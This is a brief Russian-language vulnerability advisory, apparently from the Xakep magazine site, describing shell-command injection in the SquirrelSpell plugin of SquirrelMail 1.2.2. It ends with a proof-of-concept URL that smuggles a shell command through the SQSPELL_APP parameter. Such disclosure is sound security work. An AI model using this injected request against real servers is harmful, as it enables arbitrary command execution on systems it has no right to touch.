Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
SquirrelMail - webmail программа, написанная на PHP4, для Linux и Unix систем.
SquirrelSpell - дополнение к программе для SquirrelMail. Если SquirrelSpell вызывается непосредственно, то можно передать во вводе пользователя команды оболочки. Если ввод содержит метасимволы оболочки, то могут быть выполнены произвольные команды.
Уязвимость найдена в SquirrelMail 1.2.2
Эксплоит:
host/plugins/squirrelspell/modules/check_me.mod.
php?SQSPELL_APP[blah]=wall%
20hello&sqspell_use_app=
blah&attachment_dir=/tmp&username_sqspell_data=plik